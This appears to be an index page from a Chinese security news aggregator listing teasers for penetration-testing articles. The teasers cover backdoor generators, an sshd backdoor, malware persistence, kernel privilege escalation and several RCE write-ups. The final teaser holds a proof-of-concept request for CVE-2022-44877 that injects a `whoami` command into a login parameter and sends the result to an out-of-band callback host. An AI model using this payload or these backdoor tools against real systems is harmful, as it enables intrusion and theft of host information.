渗透技巧

N每日安全动态推送(1-29)

Tencent Security Xuanwu Lab Daily News• XML Security in Java:https://semgrep.dev/blog/2022/xml-security-in-java   ・ Java...

NVillain - Windows&Linux后门生成器

安装与使用git clone https://github.com/t3l3machus/Villaincd ./Villainpip3 install -r requirements.txt以 root 身份运行:Villain.py [-h] [-p PORT] [-...

Nsshd_backdoor

sshd_backdoor This Project is based on BlackHat USA 2021 and Defcon 29. About Using ebpf technique, hijacking the process during sshd service getti...

NMalware development: persistence - part 21. Recycle Bin, My Documents COM extension handler. Simple C++ example.

﷽ Hello, cybersecurity enthusiasts and white hackers! This post is based on my own research into one of the more interesting malware persistenc...

NLinux内核pwn之基础rop提权

本文为看雪论坛优秀文章看雪论坛作者ID:mb_khygdqmu一基础知识1. linux kernel pwnkernel 也是一个程序,用来管理软件发出的数据 I/O 要求,将这些要求转义...

N高对抗内存型WebShell检测技术学习笔记

戳上面的蓝字关注我吧!01前言最近在读《信息安全学报》的时候,发现在22年11月份发布的刊文中有一篇《面向Java的高对抗内存型Webshell检测技术》[1],由中国...

N九大热门API安全工具

点击蓝字 关注我们            ///@GoUpSec随着云计算和移动计算的快速普及,API安全已经成为当下企业和互联网面临的最...

NMyBB <= 1.8.31: Remote Code Execution Chain

Visual editor persistent XSS CVE-2022-43707 (HIGH RISK) Some time ago, my colleague Igor Sak-Sakovskiy published an article: Fuzzing for XSS via ne...

NExploiting Hardcoded Keys to achieve RCE in Yellowfin BI

Introduction At Assetnote, we often audit enterprise software source code to discover pre-authentication vulnerabilities. Yellowfin BI had signific...

NControl Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877

POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-url...
1 2 3 226